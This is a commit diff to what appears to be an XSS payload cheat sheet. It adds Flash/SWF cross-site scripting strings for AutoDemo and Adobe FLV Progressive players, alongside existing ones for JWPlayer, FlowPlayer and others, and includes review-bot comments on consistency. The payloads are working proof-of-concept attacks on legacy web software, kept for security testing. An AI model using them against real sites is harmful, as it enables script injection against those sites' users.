[XSS] add extra SWF refs from notes

Yasin Soliman 2017-10-01 10:19:34 +01:00 committed by GitHub
parent 60c998c43d
commit 74b9508019

@ -128,6 +128,10 @@ javas	cript://www.google.com/%0Aalert(1)
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
- AutoDemo: `control.swf?onend=javascript:alert(1)//`
- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
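Review bot: the two added entries (AutoDemo and Adobe FLV Progressive) give no version or source, while neighbouring entries such as "JWPlayer (legacy)" and "FlowPlayer 3.2.7" at least indicate which releases are meant. Consider adding the affected version or a reference link to each, so a reader auditing a deployment can tell whether the file they host is in scope. The Adobe FLV Progressive line also writes its paths with a leading slash (`/main.swf`, `/FLVPlayer_Progressive.swf`) where the AutoDemo, Open Flash Chart and Banner.swf lines use a bare filename; pick one form for the whole list.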
@ -136,7 +140,7 @@ javas	cript://www.google.com/%0Aalert(1)
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ _Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
**Lightweight Markup Languages** **Lightweight Markup Languages**
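Review bot: the reworded note now says "Flash-based XSS payloads" while the commit subject and the list entries it closes all refer to SWF, and the subject ("add extra SWF refs from notes") does not mention a wording change. Either keep "SWF" in the note for consistency with the list above it, or mention the reword in the commit message so it is not a surprise in the history.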